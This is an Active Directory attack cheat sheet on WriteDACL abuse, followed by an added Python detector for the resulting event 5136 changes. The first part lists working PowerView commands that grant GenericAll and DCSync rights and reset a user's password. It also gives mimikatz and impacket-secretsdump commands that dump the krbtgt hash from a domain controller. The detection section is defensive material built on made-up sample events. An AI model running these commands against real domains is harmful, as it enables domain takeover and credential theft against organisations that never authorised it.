WriteDACL

Enumeration

PowerView
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

GenericAll

Abuse WriteDACL

PowerView
Add-DomainObjectAcl -TargetIdentity sieng.chantrea -PrincipalIdentity khan.chanthou -Rights All

Verify ACL

PowerView
Get-ObjectAcl -Identity sieng.chantrea -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

We can now either reset the target's password or perform a DCSync.

net user sieng.chantrea Password123 /domain

DCSync

PowerView
Add-DomainObjectAcl -TargetIdentity Object_Name -PrincipalIdentity khan.chanthou -Rights DCSync

We can now perform a DCSync attack.

mimikatz# lsadump::dcsync /user:krbtgt

impacket-secretsdump -just-dc-user krbtgt vulnableone/sqlsvc@10.10.10.10
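
Detection

The two Add-DomainObjectAcl grants above change the target's nTSecurityDescriptor, which a domain controller records as a pair of 5136 events (old value deleted, new value added) when Directory Service Changes auditing and a SACL cover the object. The following is an added example, not part of the original page: it diffs each pair and reports newly added GenericAll or replication (DCSync) ACEs. The event dictionaries, DNs and SID are constructed sample data, and it assumes events have already been exported into that shape.

```python
import re
from collections import defaultdict
# Extended-right GUIDs that together permit directory replication (DCSync).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
FULL_CONTROL = "CCDCLCSWRPWPDTLOCRSDRCWDWO"  # GenericAll as AD renders it in SDDL
FULL_CODES = {FULL_CONTROL[i:i + 2] for i in range(0, len(FULL_CONTROL), 2)}
ADDED, DELETED = "%%14674", "%%14675"  # 5136 OperationType: value added / deleted

def aces(sddl):
    """Allow ACEs of an SDDL string as (type, flags, rights, guid, inherit_guid, sid)."""
    fields = (tuple(body.split(";")) for body in re.findall(r"\(([^()]*)\)", sddl))
    return {f for f in fields if len(f) == 6 and f[0] in ("A", "OA")}

def classify(ace):
    """Name the dangerous grant carried by an ACE, or return None."""
    rights, guid = ace[2], ace[3].lower()
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    if not guid and ("GA" in codes or codes >= FULL_CODES):
        return "GenericAll"
    return REPL_RIGHTS.get(guid) if "CR" in codes else None

def new_dangerous_aces(events):
    """Diff the deleted/added descriptor of each operation; report risky new ACEs."""
    ops = defaultdict(lambda: {ADDED: set(), DELETED: set()})
    for e in events:
        if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor":
            op = ops[e["OpCorrelationID"]]
            op.setdefault(e["OperationType"], set()).update(aces(e["AttributeValue"]))
            op["meta"] = (e["SubjectUserName"], e["ObjectDN"])
    return [(*op["meta"], ace[5], classify(ace)) for op in ops.values()
            for ace in sorted(op[ADDED] - op[DELETED]) if classify(ace)]

# Constructed sample: field names follow event 5136; every value is made up.
BASE = f"D:AI(A;;{FULL_CONTROL};;;DA)(A;;RC;;;AU)"  # descriptor before the change
SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
USER_DN, DOMAIN_DN = "CN=sieng.chantrea,CN=Users,DC=corp,DC=example", "DC=corp,DC=example"

def ev(op, kind, dn, sddl):
    return {"EventID": 5136, "OpCorrelationID": op, "OperationType": kind,
            "SubjectUserName": "khan.chanthou", "ObjectDN": dn,
            "AttributeLDAPDisplayName": "nTSecurityDescriptor", "AttributeValue": sddl}

SAMPLE = [ev("op1", DELETED, USER_DN, BASE),
          ev("op1", ADDED, USER_DN, BASE + f"(A;;{FULL_CONTROL};;;{SID})"),
          ev("op2", DELETED, DOMAIN_DN, BASE),
          ev("op2", ADDED, DOMAIN_DN, BASE + "".join(f"(OA;;CR;{g};;{SID})" for g in REPL_RIGHTS))]
print(*new_dangerous_aces(SAMPLE), sep="\n")
```

Because only the difference between the old and new descriptor is reported, the pre-existing Domain Admins full-control ACE in the sample is not flagged.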
